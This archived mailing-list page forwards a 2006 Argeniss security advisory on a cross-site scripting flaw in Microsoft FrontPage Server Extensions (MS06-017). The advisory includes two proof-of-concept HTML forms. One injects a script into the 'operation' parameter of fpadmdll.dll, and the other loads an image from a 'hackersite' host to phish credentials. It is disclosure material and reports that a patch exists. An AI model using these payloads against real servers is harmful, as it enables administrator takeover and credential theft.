ПРОЕКТЫ 


  АРХИВ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 


  ПЕРСОНАЛЬНОЕ 


  ПРОГРАММЫ 



ПИШИТЕ
ПИСЬМА














     АРХИВ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting



Технические детали уязвимости

> -----Original Message-----
> From: Windows NTBugtraq Mailing List 
> [mailto:NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx] On Behalf Of 
> Esteban Martinez Fayo
> Sent: Thursday, April 13, 2006 1:30 AM
> To: NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx
> Subject: Vulnerability in Microsoft FrontPage Server 
> Extensions Could Allow Cross-Site Scripting
> 
> Argeniss Security Advisory
> 
> 
> Name:  Vulnerability in Microsoft FrontPage Server Extensions 
> Could Allow
> Cross-Site Scripting (MS06-17)
> Affected Software:  Microsoft FrontPage Server Extensions 
> 2002 and Microsoft
> SharePoint Team Services
> Severity:  Medium
> Remote exploitable:  Yes (User intervention required)
> Credits:  Esteban Mart?nez Fay?
> Date:  4/11/2006
> Advisory Number:  ARG040602
> 
> 
> Details:
> The FrontPage Server Extensions 2002 (included in Windows 
> Sever 2003 IIS 6.0
> and available as a separate download for Windows 2000 and XP) 
> has a web page
> /_vti_bin/_vti_adm/fpadmdll.dll that is used for 
> administrative purposes.
> This web page is vulnerable to cross site scripting attacks 
> allowing an
> attacker to run client-side script on behalf of an FPSE user. 
> If the victim
> is an administrator, the attacker could take complete control 
> of a Front
> Page Server Extensions 2002 server.
> 
> To exploit the vulnerability an attacker can send a specially 
> crafted e-mail
> message to a FPSE user and then persuade the user to click a 
> link in the
> e-mail message.
> In addition, this vulnerability can be exploited if an 
> attacker hosts a
> malicious website and persuade the user to visit it.
> 
> The vulnerable parameters of fpadmdll.dll are "operation", 
> "command", and
> "name". These parameters appears in the output without 
> properly sanitization
> in an HTML comment but it can be escaped with a '-->'.
> 
> Exploit Examples:
> 
> An attacker could create a FORM that POST to the FPSE server 
> and executes a
> script on the client system.
> <form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll 
> method="POST">
> <input type="hidden" name="operation" 
> value="--><script>alert()</script>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
> 
> Also, an attacker could inject an image from another web site 
> that he has
> control over and if it has HTTP authentication could convince 
> the user to
> enter its credentials and capture it.
> <form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll 
> method="POST">
> <input type="hidden" name="operation" value="--><img
> src=http://hackersite/image.jpg>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
> 
> 
> Vendor Status:
> Vendor was contacted and a patch was released.
> 
> 
> Patch Available:
> Apply patch MS06-017.
> 
> 
> Links:
> http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
> http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx
> 
> 
> Spam:
> Argeniss Ultimate 0day Exploits Pack
> http://www.argeniss.com/products.html
> 
> 
> 
> Argeniss - Information Security
> *Application Security Experts*
> http://www.argeniss.com
> 
> __________________________________________________
> Correo Yahoo!
> Espacio para todos tus mensajes, antivirus y antispam ?gratis!
> ?Abr? tu cuenta ya! - http://correo.yahoo.com.ar
> 
> --
> NTBugtraq Editor's Note:
> 
> Most viruses these days use spoofed email addresses. As such, 
> using an Anti-Virus product which automatically notifies the 
> perceived sender of a message it believes is infected may 
> well cause more harm than good. Someone who did not actually 
> send you a virus may receive the notification and scramble 
> their support staff to find an infection which never existed 
> in the first place. Suggest such notifications be disabled by 
> whomever is responsible for your AV, or at least that the 
> idea is considered.
> --
> 



 




Copyright © Lexa Software, 1996-2009.